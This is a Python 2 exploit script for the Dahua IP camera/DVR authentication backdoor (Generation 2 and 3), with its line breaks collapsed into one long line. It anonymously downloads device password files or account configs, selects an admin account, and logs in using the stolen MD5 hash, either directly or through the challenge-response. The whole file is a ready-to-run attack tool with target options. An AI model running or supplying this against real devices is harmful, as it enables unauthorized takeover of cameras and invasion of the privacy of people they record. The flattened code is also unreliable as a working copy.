#!/usr/bin/python2.7 # # Dahua backdoor Generation 2 and 3 # Author: bashis <mcw noemail eu> March 2017 # # Credentials: No credentials needed (Anonymous) #Jacked from git history # import string import sys import socket import argparse import urllib, urllib2, httplib import base64 import ssl import json import commentjson # pip install commentjson import hashlib class HTTPconnect: def __init__(self, host, proto, verbose, creds, Raw, noexploit): self.host = host self.proto = proto self.verbose = verbose self.credentials = creds self.Raw = Raw self.noexploit = False self.noexploit = noexploit def Send(self, uri, query_headers, query_data,ID): self.uri = uri self.query_headers = query_headers self.query_data = query_data self.ID = ID # Connect-timeout in seconds timeout = 5 socket.setdefaulttimeout(timeout) url = '%s://%s%s' % (self.proto, self.host, self.uri) if self.verbose: print "[Verbose] Sending:", url if self.proto == 'https': if hasattr(ssl, '_create_unverified_context'): print "[i] Creating SSL Unverified Context" ssl._create_default_https_context = ssl._create_unverified_context if self.credentials: Basic_Auth = self.credentials.split(':') if self.verbose: print "[Verbose] User:",Basic_Auth[0],"Password:",Basic_Auth[1] try: pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm() pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1]) auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr) opener = urllib2.build_opener(auth_handler) urllib2.install_opener(opener) except Exception as e: print "[!] Basic Auth Error:",e sys.exit(1) if self.noexploit and not self.verbose: print "[<] 204 Not Sending!" html = "Not sending any data" else: if self.query_data: req = urllib2.Request(url, data=json.dumps(self.query_data), headers=self.query_headers) if self.ID: req.add_header('DhWebClientSessionID',self.ID) else: req = urllib2.Request(url, None, headers=self.query_headers) if self.ID: req.add_header('DhWebClientSessionID',self.ID) rsp = urllib2.urlopen(req) # print rsp if rsp: print "[<] %s OK" % rsp.code if self.Raw: return rsp else: html = rsp.read() return html class Dahua_Backdoor: def __init__(self, rhost, proto, verbose, creds, Raw, noexploit): self.rhost = rhost self.proto = proto self.verbose = verbose self.credentials = creds self.Raw = Raw self.noexploit = False self.noexploit = noexploit # Generation 2 def Gen2(self,response,headers): self.response = response self.headers = headers html = self.response.readlines() for line in html: if line[0] == "#" or line[0] == "/n": continue line = line.split(':')[0:25] if line[1] == 'admin': print "[i] Chosing Admin Login: {}, PWD hash: {}".format(line[1],line[2]) ADMIN = line[1] PWD = line[2] break elif line[1] == '888888': print "[i] Choosing Admin Login: {}, PWD hash: {}".format(line[1],line[2]) ADMIN = line[1] PWD = line[2] break else: if line[3] == '1': print "Choosing Admin Login [{}]: {}, PWD hash: {}".format(line[0],line[1],line[2]) ADMIN = line[1] PWD = line[2] break # # Login 1 # print "[>] Requesting our session ID" query_args = {"method":"global.login", "params":{ "userName":ADMIN, "password":"", "clientType":"Web3.0"}, "id":10000} URI = '/RPC2_Login' response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw,self.noexploit).Send(URI,headers,query_args,None) json_obj = json.load(response) if self.verbose: print json.dumps(json_obj,sort_keys=True,indent=4, separators=(',', ': ')) # # Login 2 # print "[>] Logging in" query_args = {"method":"global.login", "session":json_obj['session'], "params":{ "userName":ADMIN, "password":PWD, "clientType":"Web3.0", "authorityType":"OldDigest"}, "id":10000} URI = '/RPC2_Login' response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw,self.noexploit).Send(URI,headers,query_args,json_obj['session']) print response.read() # # Wrong username/password # { "error" : { "code" : 268632071, "message" : "Component error: password not valid!" }, "id" : 10000, "result" : false, "session" : 1997483520 } # { "error" : { "code" : 268632070, "message" : "Component error: user's name not valid!" }, "id" : 10000, "result" : false, "session" : 1997734656 } # # Successfull login # { "id" : 10000, "params" : null, "result" : true, "session" : 1626533888 } # # # Logout # print "[>] Logging out" query_args = {"method":"global.logout", "params":"null", "session":json_obj['session'], "id":10001} URI = '/RPC2' response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw,self.noexploit).Send(URI,headers,query_args,None) return response # Generation 3 def Gen3(self,response,headers): self.response = response self.headers = headers json_obj = commentjson.load(self.response) if self.verbose: print json.dumps(json_obj,sort_keys=True,indent=4, separators=(',', ': ')) for who in json_obj[json_obj.keys()[0]]: if who['Group'] == 'admin': USER_NAME = who['Name'] PWDDB_HASH = who['Password'] AUTH_NO = len(who['AuthorityList']) if AUTH_NO >= 20: print "[i] Choosing Admin Login: {}, Auth: {}".format(who['Name'],len(who['AuthorityList'])) break # # Request login # print "[>] Requesting our session ID" query_args = {"method":"global.login", "params":{ "userName":USER_NAME, "password":"", "clientType":"Web3.0"}, "id":10000} URI = '/RPC2_Login' response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw,self.noexploit).Send(URI,headers,query_args,None) json_obj = json.load(response) if self.verbose: print json.dumps(json_obj,sort_keys=True,indent=4, separators=(',', ': ')) RANDOM = json_obj['params']['random'] PASS = ''+ USER_NAME +':' + RANDOM + ':' + PWDDB_HASH + '' RANDOM_HASH = hashlib.md5(PASS).hexdigest().upper() print "[i] Downloaded MD5 hash:",PWDDB_HASH print "[i] Random value to encrypt with:",RANDOM print "[i] Built password:",PASS print "[i] MD5 generated password:",RANDOM_HASH # # Login # print "[>] Logging in" query_args = {"method":"global.login", "session":json_obj['session'], "params":{ "userName":USER_NAME, "password":RANDOM_HASH, "clientType":"Web3.0", "authorityType":"Default"}, "id":10000} URI = '/RPC2_Login' response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw,self.noexploit).Send(URI,headers,query_args,json_obj['session']) print response.read() # Wrong username/password # { "error" : { "code" : 268632071, "message" : "Component error: password not valid!" }, "id" : 10000, "result" : false, "session" : 1156538295 } # { "error" : { "code" : 268632070, "message" : "Component error: user's name not valid!" }, "id" : 10000, "result" : false, "session" : 1175812023 } # # Successfull login # { "id" : 10000, "params" : null, "result" : true, "session" : 1175746743 } # # # Logout # print "[>] Logging out" query_args = {"method":"global.logout", "params":"null", "session":json_obj['session'], "id":10001} URI = '/RPC2' response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw,self.noexploit).Send(URI,headers,query_args,None) return response # # Validate correctness of HOST, IP and PORT # class Validate: def __init__(self,verbose): self.verbose = verbose # Check if IP is valid def CheckIP(self,IP): self.IP = IP ip = self.IP.split('.') if len(ip) != 4: return False for tmp in ip: if not tmp.isdigit(): return False i = int(tmp) if i < 0 or i > 255: return False return True # Check if PORT is valid def Port(self,PORT): self.PORT = PORT if int(self.PORT) < 1 or int(self.PORT) > 65535: return False else: return True # Check if HOST is valid def Host(self,HOST): self.HOST = HOST try: # Check valid IP socket.inet_aton(self.HOST) # Will generate exeption if we try with DNS or invalid IP # Now we check if it is correct typed IP if self.CheckIP(self.HOST): return self.HOST else: return False except socket.error as e: # Else check valid DNS name, and use the IP address try: self.HOST = socket.gethostbyname(self.HOST) return self.HOST except socket.error as e: return False if __name__ == '__main__': # # Help, info and pre-defined values # INFO = '[Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]/n' HTTP = "http" HTTPS = "https" proto = HTTP verbose = False noexploit = False raw_request = True rhost = '192.168.5.2' # Default Remote HOST rport = '80' # Default Remote PORT # creds = 'root:pass' creds = False # # Try to parse all arguments # try: arg_parser = argparse.ArgumentParser( prog=sys.argv[0], description=('[*] '+ INFO +' [*]')) arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']') arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']') if creds: arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']') arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]') arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]') arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]') args = arg_parser.parse_args() except Exception as e: print INFO,"/nError: %s/n" % str(e) sys.exit(1) # We want at least one argument, so print out help if len(sys.argv) == 1: arg_parser.parse_args(['-h']) print "/n[*]",INFO if args.verbose: verbose = args.verbose # # Check validity, update if needed, of provided options # if args.https: proto = HTTPS if not args.rport: rport = '443' if creds and args.auth: creds = args.auth if args.noexploit: noexploit = args.noexploit if args.rport: rport = args.rport if args.rhost: rhost = args.rhost # Check if RPORT is valid if not Validate(verbose).Port(rport): print "[!] Invalid RPORT - Choose between 1 and 65535" sys.exit(1) # Check if RHOST is valid IP or FQDN, get IP back rhost = Validate(verbose).Host(rhost) if not rhost: print "[!] Invalid RHOST" sys.exit(1) # # Validation done, start print out stuff to the user # if noexploit: print "[i] Test mode selected, no exploiting..." if args.https: print "[i] HTTPS / SSL Mode Selected" print "[i] Remote target IP:",rhost print "[i] Remote target PORT:",rport # print "[i] Connect back IP:",lhost # print "[i] Connect back PORT:",lport rhost = rhost + ':' + rport headers = { 'Connection': 'close', 'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8', 'Accept' : '*/*', 'X-Requested-With' : 'XMLHttpRequest', 'X-Request' : 'JSON', 'User-Agent':'Mozilla/5.0', } try: print "[>] Checking for backdoor version" URI = "/current_config/passwd" response = HTTPconnect(rhost,proto,verbose,creds,raw_request,noexploit).Send(URI,headers,None,None) print "[!] Generation 2 found" reponse = Dahua_Backdoor(rhost,proto,verbose,creds,raw_request,noexploit).Gen2(response,headers) except urllib2.HTTPError as e: if e.code == 404: try: URI = '/current_config/Account1' response = HTTPconnect(rhost,proto,verbose,creds,raw_request,noexploit).Send(URI,headers,None,None) print "[!] Generation 3 Found" response = Dahua_Backdoor(rhost,proto,verbose,creds,raw_request,noexploit).Gen3(response,headers) except urllib2.HTTPError as e: if e.code == 404: print "[!] Seems not to be Dahua device! ({})".format(e.code) sys.exit(1) else: print "Error Code: {}".format(e.code) except Exception as e: print "[!] Detect of target failed (%s)" % e sys.exit(1) print "/n[*] All done.../n" sys.exit(0)
评论